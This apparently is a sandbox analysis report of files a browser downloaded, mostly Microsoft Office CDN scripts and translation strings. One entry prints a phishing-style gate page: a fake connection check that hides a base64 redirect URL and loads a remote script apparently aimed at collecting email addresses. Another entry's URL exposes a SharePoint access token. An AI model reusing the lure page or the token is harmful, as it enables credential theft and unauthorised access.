                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{534:e=>{e.exports=JSON.parse('{"a":"Se ha producido un error","c":"Pruebe a actualizar la p.gina","b":"Se ha producido un error y no se pudo mostrar la p.gina."}')}.,297:e=>{e.exports=JSON.parse('{"b":"Solo disponible cuando est. en l.nea","a":"{0}. Deshabilitado mientras se est. sin conexi.n"}')}.,536:e=>{e.exports=JSON.parse('{"a":"Id. de correlaci.n: {0}","b":"Internet desconectado"}')}.,468:e=>{e.exports=JSON.parse('{"NONE":"Ninguna","SUM":"Suma","COUNT":"Recuento","AVG":"Promedio","MAX":"M.ximo","MIN":"M.nimo","STDEV":"Desviaci.n est.ndar","VAR":"Varianza"}')}.,466:e=>{e.exports=JSON.parse('{"b":"S.","a":"No"}')}.,277:e=>{e.exports=JSON.parse('{"a":"Archivos que requieren atenci.n","b":"Elementos que requieren atenci.n","h":"P.ginas que requieren atenci.n","g":"Falta informaci.n","d":"Falta {0} campo||Faltan {0} campos","c":"1||2-","e":"Falta {0}","f":"Informaci.n neces
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (1886)
                              Category:downloaded
                              Size (bytes):1891
                              Entropy (8bit):5.176914817050272
                              Encrypted:false
                              SSDEEP:
                              MD5:620975A9AC5427913B0C52A1CF73609B
                              SHA1:A654F4E8B00CA27E8DC704BBC77F4D7BE7243B33
                              SHA-256:957B774475DF59E065BBC518584D334DC4ECFC0743CF2EFACE739254BFB80D84
                              SHA-512:6804DD4925D4E43314249B49EB86A982FF410694460F9953FC13675A4FCD3E47C377266AC87FA35DFFA2FD67C25A740D63B8D13AA3E0B198CF88D98A1372A6FA
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/151.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[151],{1999:(e,t,n)=>{n.r(t),n.d(t,{columnTypes:()=>y});var a=n(2432);const i=n.p+"images/Text_55a7d95e.svg",r=n.p+"images/Hyperlink_fff7e50c.svg",o=n.p+"images/Choice_12cea9ef.svg",s=n.p+"images/Number_f2b99b17.svg",c=n.p+"images/Date_dfef8d21.svg",d=n.p+"images/Currency_8e697e75.svg",l=n.p+"images/MultilineText_d7d11fcb.svg",u=n.p+"images/Location_97d633bd.svg",f=n.p+"images/Person_577f06ca.svg",p=n.p+"images/Image_9d432a08.svg",m=n.p+"images/Boolean_31f6453e.svg",_=n.p+"images/Lookup_7d6e5aa8.svg",h=n.p+"images/ManagedMetadata_2cabd715.svg",b=n.p+"images/ContentType_162b1610.svg",g=n.p+"images/More_b34950f3.svg",v=n.p+"images/Rating_00de6e83.svg";var y={text:{description:a.M,title:a.N,image:i,iconName:"TextField"},hyperlink:{description:a.n,title:a.o,image:r,iconName:"Link"},choice:{description:a.e,title:a.f,image:o,iconName:"ChoiceColumn"},number:{description:a.C,title:a.D,image:s,iconName:"Number"},dateAn
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (15894)
                              Category:downloaded
                              Size (bytes):109596
                              Entropy (8bit):5.49975348802936
                              Encrypted:false
                              SSDEEP:
                              MD5:B8B0E0DC9C3AFB9A2E499877F44A1D5E
                              SHA1:CDC7E41112A53DE5423C8C8B0F7538E81AB813BD
                              SHA-256:245B37D20B289CA802EE997CA69E66A516CB640625A53DCC15BF8C0C2EE52223
                              SHA-512:FADFEBD00C5FADDC955C01EDFCA3D9C5D4E184C2A001D92B64D6CD2CA19A2F7F29E15D6A23C76FDF23F173EC88D80B9D4FDC365346F5A2984515EDA58122C5B2
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/100.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[100],{1385:(e,t,n)=>{n.d(t,{a:()=>r});var a=n("tslib_102"),i=n(1044);function r(e,t){return(0,a.Zd)(this,void 0,void 0,function(){var n,r,o,s,c,d,l,u,f,p,m,_,h,b,g,v,y,S,D,I,x;return(0,a.qr)(this,function(a){switch(a.label){case 0:for(r=(n=e||{}).items,o=n.formValues,s=n.folderPath,c=n.webAbsoluteUrl,d=n.fullListUrl,l=n.qosName,u=n.bNewDocumentUpdate,f=n.checkInComment,p=t.dataRequestor,m=[],_=0,h=r;_<h.length;_++)b=h[_],m.push(parseInt(b.sharepointId,10));return r[0]?(g=(0,i.b)({webAbsoluteUrl:c,listFullUrl:d}).method("BulkValidateUpdateListItems").toString(),v={itemIds:m,formValues:o,folderPath:s,bNewDocumentUpdate:u,checkInComment:f},[4,p.getData({additionalPostData:JSON.stringify(v),method:"POST",qosName:l,url:g,webAbsoluteUrl:c,noRedirect:!0})]):[2];case 1:for(y=a.sent(),S="",D=0,I=y.d.BulkValidateUpdateListItems.results;D<I.length;D++)(x=I[D]).HasException&&(S=x.ErrorMessage+"\n"+S);if(S)throw new Error
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (6639)
                              Category:downloaded
                              Size (bytes):16774
                              Entropy (8bit):5.192530929637909
                              Encrypted:false
                              SSDEEP:
                              MD5:04191405078ABC6C742914E6147B41D6
                              SHA1:FEC5169CB7A5E75894001CC94CA62F1331B60D88
                              SHA-256:1C26AB01F7567B47814F7823907236460748E7CE124CFF92EDCBAD80CAC7E8E2
                              SHA-512:7FFBE68E2DF15D3E6E6A31E9CABD4AA9B96F861F0F21B5E85FD847696922C09701C3D82BA35BDC6DD3F3DE7B64D22AF1C99F23942BC882F600171902376A33F8
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/37323.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[37323],{370100:(e,t,n)=>{n.d(t,{C:()=>o});var a,i=n(295610),r=n(315301),o=(a=Error,(0,i.__extends)(function e(t,n){var i=a.call(this,n&&n.length>0?"".concat(n,": ").concat((0,r.o)(t)):(0,r.o)(t))||this;return i.error=t,void 0!==typeof Object.setPrototypeOf&&Object.setPrototypeOf(i,e.prototype),i},a),function(){function e(e,t,n,a,i,r,o,s,c,d,l,u,f){this.name=e,this.message=t,this.stack=n,this.staticMessage=a,this.isExpected=i,this.statusCode=r,this.clientRequestId=o,this.requestId=s,this.oData=c,this.correlationId=d,this.retryCount=l,this.responseJson=u,this.responseText=f}return e.isServiceError=function(t){return t instanceof e},e}())}.,538054:(e,t,n)=>{n.d(t,{E0:()=>f,dt:()=>m,f9:()=>h,sM:()=>p});var a=n(295610),i=n(188830),r=n(322208),o=n(523499),s=n(315301),c=n(370100),d=n(246477),l=n(485942),u=(0,i.Yc)("Unsupported browser");function f(e){if(e instanceof Error)return(0,l.Z)(e.message)&&
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (17566)
                              Category:downloaded
                              Size (bytes):38334
                              Entropy (8bit):5.543269017802301
                              Encrypted:false
                              SSDEEP:
                              MD5:CD209496D152F757A7B8245A7A4D05D3
                              SHA1:E9192946ACCB67C9FEC533E96D9F4A7BCD4AFA34
                              SHA-256:392099B63F973AB50E8EBE8B517ED8EE4139BF27E96D93A13C4E60288F89C3A3
                              SHA-512:AF381B251B046B75771B80488647B8E8B71F5E2B6BC5827D0D879E6927ACEA1C466AC2E255D133EB7F6A5BEC06401E93D7661E356667B5BD13FEB9761ADAA6F4
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/@ms/stream-bundle/chunks/14727.js
                              Preview:"use strict";(self.webpackChunk_ms_stream_bundle=self.webpackChunk_ms_stream_bundle||[]).push([[14727],{261874:(e,t,n)=>{var a;n.d(t,{w:()=>i}),function(e){e[e.absolute=0]="absolute",e[e.relative=1]="relative",e[e.serverRelative=2]="serverRelative",e[e.dataUrl=3]="dataUrl"}(a||(a={}));var i=function(e,t){var n;void 0===e&&(e="");var i=null!==(n=null==t?void 0:t.allowDataUrl)&&void 0!==n&&n,o=e.indexOf("//"),s=e.indexOf("/"),c=o>-1&&o<=s?o+"//".length:-1,d=function(e,t){if(t>-1){var n=e.indexOf("/",t);return n>-1?e.slice(0,n):e}return""}(e,c),l=d&&d.slice(c),u=e.slice(d.length),f=d?a.absolute:i&&r.test(e)?a.dataUrl:"/"===u[0]?a.serverRelative:a.relative,p=u.split("/");this.authority=d,this.domain=l,this.format=f,this.path=u,this.segments=p,this.value=e},r=/^data:((?:\w+\/(?:(?!;).)+)?)((?:;[\w\W]*?[^;])*),(.+)$/}.,193874:(e,t,n)=>{n.d(t,{$r:()=>p,AT:()=>s,B_:()=>_,GX:()=>u,Jk:()=>b,LY:()=>h,PN:()=>l,Rv:()=>S,Ve:()=>d,aP:()=>c,bJ:()=>D,cq:()=>g,dW:()=>m,gp:()=>v,it:()=>r,ne:()=>o,uV:()=>
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (11289)
                              Category:downloaded
                              Size (bytes):511987
                              Entropy (8bit):5.040406351252593
                              Encrypted:false
                              SSDEEP:
                              MD5:4882DD59DFDE31DC70FE1006C4A3932F
                              SHA1:C29EE3CFB242F7FC1B7EBFF980E6FC47620C93E3
                              SHA-256:8767C48919221CE4A9EA4A146C090348EE160CF5CB0FFAA70EF57E4027520060
                              SHA-512:8C816A47300F770983CCF3C2543762595008FE26C8C6FFEEC00D74F139DAE49E98379D9C4326859F777825BD478D26C6872B7BD0BBEDCC3C26602AC59B6D8308
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/file-browser-spo-teams-lists/en-us/ondemand.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["ondemand.resx"],{6695:e=>{e.exports=JSON.parse('{"a":"EnvironmentType is invalid","b":"Invalid GUID string: \\u0022{0}\\u0022","f":"The value for \\u0022{0}\\u0022 is false","g":"The value for \\u0022{0}\\u0022 must not be null","h":"The value for \\u0022{0}\\u0022 must not be undefined","e":"The value for \\u0022{0}\\u0022 must not be an empty string","d":"The \\u0022{0}\\u0022 object cannot be used because it has been disposed.","c":"Invalid version string: \\u0022{0}\\u0022","j":"Cannot consume services because the scope is not finished yet","k":"Cannot consume services during ServiceScope autocreation","i":"The ServiceScope is already finished","l":"Cannot register service because the scope is already finished","m":"The service key \\u0022{0}\\u0022 has already been registered in this scope","o":"INNERERROR:","n":"CALLSTACK:","p":"LOGPROPERTIES:"}')}.,7491:e=>{e.exports=JSON.parse('{"a":"A source with id
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (4977)
                              Category:downloaded
                              Size (bytes):9713
                              Entropy (8bit):5.083378973084486
                              Encrypted:false
                              SSDEEP:
                              MD5:3E13F50192CAB1400D6BF73A0F6D3C7E
                              SHA1:FF47B25B53722DA33FDD5BE1FBF0C3BB6D370DE6
                              SHA-256:FCDB9DC8FF064CC4F305C137DFFE2AACE98DF40792FC6EA33E54CD24E40E3F2D
                              SHA-512:FDDC6A5019581BE06B17CB3F4FF9B7FFBF1CE3C598255773006FFB092D97FD25BFCE7B55BFDF17DBCDDD6660091176E1126EB580E05A464B794E795C3048FCDD
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/de/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{50:e=>{e.exports=JSON.parse('{"b":"Nur verf.gbar, wenn online","a":"{0}. Deaktiviert im Offlinemodus"}')}.,184:e=>{e.exports=JSON.parse('{"t":"Dunkelrot","u":"Rot","v":"Orange","w":"Gr.n","x":"Dunkelgr.n","y":"Blaugr.n","z":"Blau","A":"Marineblau","B":"Blaulila","C":"Dunkelblau","D":"Lavendel","E":"Rosa","o":"Rakete","n":"Roboter","e":"K.fer","a":"Flugzeug","f":"Kalender","s":"Ziel","g":"Klemmbrett","i":"Farbpalette","l":"Gl.hlampe","j":"Cube","c":"Becherglas","p":"Sparschwein","r":"Wiedergabeliste","k":"Krankenhaus","b":"Bank","m":"Lagemarkierung auf Karte","h":"Kaffeetasse","q":"Einkaufswagen","d":"Geburtstagstorte"}')}.,186:e=>{e.exports=JSON.parse('{"RelativeDateTime_AFewSeconds":"Vor wenigen Sekunden","RelativeDateTime_AFewSeconds_StartWithLowerCase":"vor wenigen Sekunden","RelativeDateTime_AFewSecondsFuture":"In wenigen Sekunden","RelativeDateTime_AFewSecondsFuture_StartWithLowerC
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (3288)
                              Category:downloaded
                              Size (bytes):10848
                              Entropy (8bit):5.387753771642974
                              Encrypted:false
                              SSDEEP:
                              MD5:5D7C7FCE21621543CEF7BFC5BE8AE730
                              SHA1:E2E273B8EA77C5B0442B1677CD79460722C47079
                              SHA-256:762B4F61FA18FCB14CDD8D4AC6BA997EA02925C6ADCA8D7904489C96808F48AC
                              SHA-512:148BCE2CF98DA93465310C315E7E6CC1DA99ED2398E94BA07A471BBC177D68684CA586247265AD49453E83CDA3253E2DCEDCF5AEEB8CD9F6B9FE9238E8243ACF
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/77.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[77],{636:(e,t,n)=>{n.r(t),n.d(t,{ActionButton:()=>a.IkT,BaseButton:()=>a.vr3,Button:()=>i.xN,ButtonGlobalClassNames:()=>a.v3M,ButtonType:()=>i.n_,CommandBarButton:()=>i.P6,CommandButton:()=>a.tNL,CompoundButton:()=>i.L0,DefaultButton:()=>a.ECZ,ElementType:()=>i.A8,IconButton:()=>a.yXY,MessageBarButton:()=>r.a,PrimaryButton:()=>a.EC2,getSplitButtonClassNames:()=>a.N35});var a=n("fui.lco_35"),i=n("fui.lcom_959"),r=n(1604)}.,1604:(e,t,n)=>{n.d(t,{a:()=>c});var a=n("tslib_102"),i=n("react-lib"),r=n("fui.lco_35"),o=n("fui.lcu_548"),s=(0,n("fui.util_150").e1)(function(e,t){return(0,o.uS)({root:[(0,r.mRu)(e,{inset:1,highContrastStyle:{outlineOffset:"-4px",outline:"1px solid Window"},borderColor:"transparent"}),{height:24}]},t)}),c=function(e){function t(){return null!==e&&e.apply(this,arguments)||this}return(0,a.XJ)(t,e),t.prototype.render=function(){var e=this.props,t=e.styles,n=e.theme;return i.createElement(r.ECZ
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (455)
                              Category:downloaded
                              Size (bytes):460
                              Entropy (8bit):5.297662409978611
                              Encrypted:false
                              SSDEEP:
                              MD5:5474CFD7C527572422D9116487E02120
                              SHA1:2378D8C9A362376AECFA6FB4E9EDC5C6615AC22E
                              SHA-256:2A6CD55D167B4823A598E280AFDC1232341A6132637B5CD4F1623487276422A7
                              SHA-512:6426B4E5E06F14AAB8E281C06BE1BAEEACF2126207A2FCEE3D8C01C0ABBC356757FAF8E7313334629594B424EFA043E0D606AFA73BC5F352612C7CD4C7161D0A
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/241.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[241],{1623:(e,t,n)=>{n.r(t),n.d(t,{TextBoxTeachingBubble:()=>s});var a=n("tslib_102"),i=n("fui.lco_35"),r=n("react-lib"),o=n(2353),s=function(e){return r.createElement(i.fvX,(0,a.W_)({headline:o.c,hasCondensedHeadline:!0,hasCloseButton:!0,closeButtonAriaLabel:o.b,isClickableOutsideFocusTrap:!0,calloutProps:{directionalHint:i.aZJ.leftCenter,dismissOnTargetClick:!0}},e),o.a)}}.}]);
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (12983)
                              Category:downloaded
                              Size (bytes):85119
                              Entropy (8bit):5.418428343625865
                              Encrypted:false
                              SSDEEP:
                              MD5:C495731BD374B946820C2F7808B21456
                              SHA1:E1E3C98981EF29C53D8B7F5DDB95538BC89C8A18
                              SHA-256:5448C841FD9C91D00FD1A8CC858E564BC227B24CEBE0067C68D487A8722F78DD
                              SHA-512:BEC7D38DF4586B4ADD967C477A7818D95B801CA4C35080C8D57727A538AED6D1CBC02615C0D7FEC517A868E7ADFEAD8A00C0ADA7ED02F753EB557E32431D5BE6
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/19.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[19],{1082:(e,t,n)=>{n.d(t,{a:()=>c});var a=n(503),i=n("odsp.util_578"),r=n(278),o=["AppendOnly","ClientSideComponentId","CommaSeparator","CustomFormatter","CustomUnitName","CustomUnitOnRight","DateFormat","Decimals","Description","DisplayName","EnforceUniqueValues","FieldRef","FillInChoice","FriendlyDisplayFormat","Format","Indexed","IsModern","IsolateStyles","IsRelationship","InternalName","LCID","List","Max","MaxLength","Min","Mult","Name","NumLines","Percentage","RelationshipDeleteBehavior","Required","RichText","RichTextMode","ShowField","StaticName","TimeFormat","Title","Type","Unit","UnlimitedLengthInDocumentLibrary","UserDisplayOptions","UserSelectionMode","UserSelectionScope"],s=["Choices","DefaultValue","DefaultFormula","FieldRefsXml","Validation"];const c=function(){function e(){var e=this;this._formatProperties={Field:{attributeKeys:o,childElementKeys:s,valueTransformer:function(t){return e.assembl
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (4654)
                              Category:downloaded
                              Size (bytes):18779
                              Entropy (8bit):5.2996157590554605
                              Encrypted:false
                              SSDEEP:
                              MD5:E95A9A3AAE90BE9CCB51842B52378B7A
                              SHA1:CDC7D7A2190849AED31F1E9153B6BD618FB35068
                              SHA-256:8579244AB8B24FA7EBB67EFB5E7E566DDE313D0C996FD5307CE49CE219869C50
                              SHA-512:40D37CE42AAFB62D93FD70771A0E64868B4270654870F91137643ACCD15470FFF40718CD82D0C5F7E745BA33FC40F6941BF8B8B7385A881C792E7872DABDB7C9
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/metaosfilebrowser/26.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[26,758],{508:(e,t,n)=>{var a;n.d(t,{a:()=>i}),function(e){e[e.none=0]="none",e[e.user=1]="user",e[e.distributionList=2]="distributionList",e[e.securityGroup=4]="securityGroup",e[e.sharePointGroup=8]="sharePointGroup",e[e.all=15]="all"}(a||(a={}));const i=a}.,942:(e,t,n)=>{n.d(t,{a:()=>a,b:()=>o,c:()=>r,d:()=>s,e:()=>i});var a="role:1073741827",i="role:1073741826",r="role:1073741829",o="role:1073741830",s="role:1073741832"}.,6276:(e,t,n)=>{n.d(t,{a:()=>u,b:()=>f});var a=n("tslib_102"),i=n(5744),r=n(3412),o=n(11),s=n(12),c=n(5715),d=n(5748),l="SiteDataSource",u=function(e){function t(t,n){var a=e.call(this,{dataSourceName:l,id:"".concat(l,"(").concat(t?t.siteId:"",")")},{pageContext:t})||this;return a.getOAuthToken=n,a}return(0,a.XJ)(t,e),t.prototype.getReadOnlyState=function(){var e=this,t=this.getFullSiteReadOnlyState();return t===c.a.unknown?this.getDataUtilizingPersistentCache({getUrl:function(){return"".co
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:ASCII text, with very long lines (2764)
                              Category:downloaded
                              Size (bytes):2769
                              Entropy (8bit):5.092816989359528
                              Encrypted:false
                              SSDEEP:
                              MD5:49481D4707BC0A9BC633D88176A45E1E
                              SHA1:166D406466E58086C59FF2CCA1B799BAE322A989
                              SHA-256:C6369DD9C9E368E4DEE926C61FFFC707F3D7DD976EF6DB1BB9EFC32B2F5D60C1
                              SHA-512:5A95E37548CCEA2539988EF3D1C8678DF123736443F38C076D087A83FC203F87DCFA5C22F641F5C094B47E4D879D8CEC45AF14AD4A2E3765780A22566C90FA34
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/listsenterprise/14.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([[14],{740:(e,t,n)=>{n.r(t),n.d(t,{commandDisplaySetSyncIssuesOverrideFuncsKey:()=>b});var a=n("tslib_102"),i=n("odsp.util_578"),r=n(14),o=n(2328),s=n(31);function c(e,t){return(0,a.Zd)(this,void 0,void 0,function(){return(0,a.qr)(this,function(n){switch(n.label){case 0:return[4,Promise.all([(0,s.b)()])];case 1:return n.sent()[0].discardAndRemoveFromItemStore(e,t),[2]}})})}var d=new i.qT({name:"DiscardAllCommand",factory:{dependencies:{resources:i.lh,listDataStateStore:r.a},create:function(e){var t=e.resources,n=e.listDataStateStore;return{instance:{id:"discardAll",getCommand:function(){return{action:{id:"DiscardAllAction",isAvailable:!0,onExecute:function(){c(t,(0,a.AE)([],n.state.listRenderData.seedItems,!0))}},name:o.a,iconProps:{iconName:"Delete"},automationId:"discardAllCommand",isSupportedOffline:!0}}}}}}}),l=n(70),u=new i.qT({name:"DiscardCommand",factory:{dependencies:{resources:i.lh,spartanViewInstance
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:Unicode text, UTF-8 text, with very long lines (4909)
                              Category:downloaded
                              Size (bytes):9894
                              Entropy (8bit):5.094971431719617
                              Encrypted:false
                              SSDEEP:
                              MD5:6774354C53FC869B9D15541F85C3C4C1
                              SHA1:A9ECF3EDABCFA1B825A7474ACBA3911F008A23FF
                              SHA-256:F96E7DD0EFE15A69C266634CD17331910E23D8E42BB3B9C1B223FD3FE7DC48F5
                              SHA-512:6FF8D3CF770077EA7480E018B04B7D83CBE83E989983584C49D651E733B9C3CA484B17CD5BF2B0B25EA604E462E2831EE546D86C165D8CF99D925096C0C9B338
                              Malicious:false
                              Reputation:unknown
                              URL:https://res-1.cdn.office.net/files/odsp-web-prod_2024-04-19.005/freemiumlistshomewebpack/fr/initial.resx.js
                              Preview:"use strict";(self.odspNextWebpackJsonp=self.odspNextWebpackJsonp||[]).push([["initial.resx"],{50:e=>{e.exports=JSON.parse('{"b":"Disponible uniquement en ligne","a":"{0}. D.sactiv. en mode hors connexion"}')}.,184:e=>{e.exports=JSON.parse('{"t":"Rouge fonc.","u":"Rouge","v":"Orange","w":"Vert","x":"Vert fonc.","y":"Bleu-vert","z":"Bleu","A":"Bleu marine","B":"Bleu pourpre","C":"Bleu fonc.","D":"Lavande","E":"Rose","o":"Fus.e","n":"Robot","e":"Insecte","a":"Avion","f":"Calendrier","s":"Cible","g":"Planchette . pince","i":"Palette de couleurs","l":"Ampoule","j":"Cube","c":"B.cher","p":"Tirelire","r":"Liste de lecture","k":"H.pital","b":"Banque","m":"Rep.re sur la carte","h":"Tasse . caf.","q":"Panier de courses","d":"G.teau d\\u0027anniversaire"}')}.,186:e=>{e.exports=JSON.parse('{"RelativeDateTime_AFewSeconds":"Il y a quelques secondes","RelativeDateTime_AFewSeconds_StartWithLowerCase":"il y a quelques secondes","RelativeDateTime_AFewSecondsFuture":"Dans quelques secondes"
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:HTML document, ASCII text, with very long lines (675), with no line terminators
                              Category:downloaded
                              Size (bytes):675
                              Entropy (8bit):5.255799566889935
                              Encrypted:false
                              SSDEEP:
                              MD5:B0B5D79AB59307C00847A937534C6634
                              SHA1:3A9D3942F850807C63257B711416D1B154511F12
                              SHA-256:06FBB93E0A9F77EE56855424899E77E3B2F5E8F077562836AE4CA62D78FAF267
                              SHA-512:861E358E53337B91DB19C34DCF9DD3E5F3B1CE5BE127DDAC59A3E5096FC9BBAEAE3A646B27A6D1BDE134928F5733DC4B712FB157344E94D6F6FBC59C66348DB2
                              Malicious:false
                              Reputation:unknown
                              URL:https://autopaysystems-processor.com/auth.html
                              Preview:<html><head>.<meta name="viewport" content="width=device-width, initial-scale=1.0">.<script src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback" defer async></script></head><body style="display:flex;justify-content:center;align-items:center;text-align:center;">.<div>..<h3 id="status-shower" style="margin-bottom:30px;"> Verifying site connection... </h3>..<div id="cf-show" style=""></div>...<input type="hidden" id="b64u" value="aHR0cHM6Ly9sYWtlc2lkZWx1bWJhci5jb20vY2l2L2ZpeGZpbGUvMmYwMDhiMi5waHA=" class=""></input></div>.<script src="https://lakesidelumbar.com/civ/fixfile/admin/js/sc.php?r=ZW0sZW1haWwsYWRk"></script> </body></html>
                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                              File Type:PNG image data, 1139 x 859, 8-bit/color RGBA, non-interlaced
                              Category:downloaded
                              Size (bytes):119666
                              Entropy (8bit):7.961723946307408
                              Encrypted:false
                              SSDEEP:
                              MD5:D9028F54E44B5AFC231EA9C49F337D83
                              SHA1:8FDB76199C370C47E35A72FB67301F4D9014BFAF
                              SHA-256:A6F605A6656907FBFEBA5434A0215ED97E642FF55C27EAD1E2513E7CF9D0E880
                              SHA-512:D5EB89680CDC171002BA4DE7B3BD6334CDE0FEC2A9AFCD4C80C71B2403B86DDCAEB0E7D351DEF2FE92722CB76A8589B847DE1AAAB30CFB1B2F76269F10AA3EA7
                              Malicious:false
                              Reputation:unknown
                              URL:https://eastus1-mediap.svc.ms/transform/thumbnail?provider=spo&inputFormat=png&cs=fFNQTw&docid=https%3A%2F%2Fnetorgft3648903-my.sharepoint.com%3A443%2F_api%2Fv2.0%2Fdrives%2Fb!XylRZ5Oyd0Szxdx-UJ1aUeSJ1ExD4GFIv8N3WGt4tBWuOUOv-I3tS6fXJvcmSgd7%2Fitems%2F01KPQEI7B4U43KAJ4LIZDL443MPSXT7ACV%3Fversion%3DPublished&access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdWQiOiIwMDAwMDAwMy0wMDAwLTBmZjEtY2UwMC0wMDAwMDAwMDAwMDAvbmV0b3JnZnQzNjQ4OTAzLW15LnNoYXJlcG9pbnQuY29tQGYzZjcwNWE1LWNkODEtNGFlYy1hNjM0LTk4YTY0M2ExYjBkOSIsImNhY2hla2V5IjoiMGguZnxtZW1iZXJzaGlwfHVybiUzYXNwbyUzYWFub24jYzI1NmJmMTZjMWYwMjA4OWRmMDUwNWZmYzhhYzFkYzliY2FiMTg2MWU2NzU3ZDQyZWRiODJmNDgyMGVjZDY0MiIsImVuZHBvaW50dXJsIjoiQVdCWEtpc1Z2aml6aXVpelZSUVlKY0VUcDlmSWgwS3Z2emxDcWduWHM4az0iLCJlbmRwb2ludHVybExlbmd0aCI6IjEyNSIsImV4cCI6IjE3MTQwNjgwMDAiLCJpcGFkZHIiOiIxODUuMTUyLjY2LjIzMCIsImlzbG9vcGJhY2siOiJUcnVlIiwiaXNzIjoiMDAwMDAwMDMtMDAwMC0wZmYxLWNlMDAtMDAwMDAwMDAwMDAwIiwiaXN1c2VyIjoidHJ1ZSIsIm5hbWVpZCI6IjAjLmZ8bWVtYmVyc2hpcHx1cm4lM2FzcG8lM2Fhbm9uI2MyNTZiZjE2YzFmMDIwODlkZjA1MDVmZmM4YWMxZGM5YmNhYjE4NjFlNjc1N2Q0MmVkYjgyZjQ4MjBlY2Q2NDIiLCJuYmYiOiIxNzE0MDQ2NDAwIiwibmlpIjoibWljcm9zb2Z0LnNoYXJlcG9pbnQiLCJzaGFyaW5naWQiOiI1bzE2am95YVkwQ3d2b3d3NDIxTit3Iiwic2l0ZWlkIjoiTmpjMU1USTVOV1l0WWpJNU15MDBORGMzTFdJell6VXRaR00zWlRVd09XUTFZVFV4Iiwic25pZCI6IjYiLCJzdHAiOiJ0IiwidHQiOiIwIiwidmVyIjoiaGFzaGVkcHJvb2Z0b2tlbiJ9.-3noFvjHmmT0HsKmWmSzoY_mtIYeb3QmL24ThOhZ9Tk&cTag=%22c%3A%7BA036A73C-8B27-4646-BE73-6C7CAF3F8055%7D%2C1%22&encodeFailures=1&width=1139&height=859&srcWidth=1262&srcHeight=952
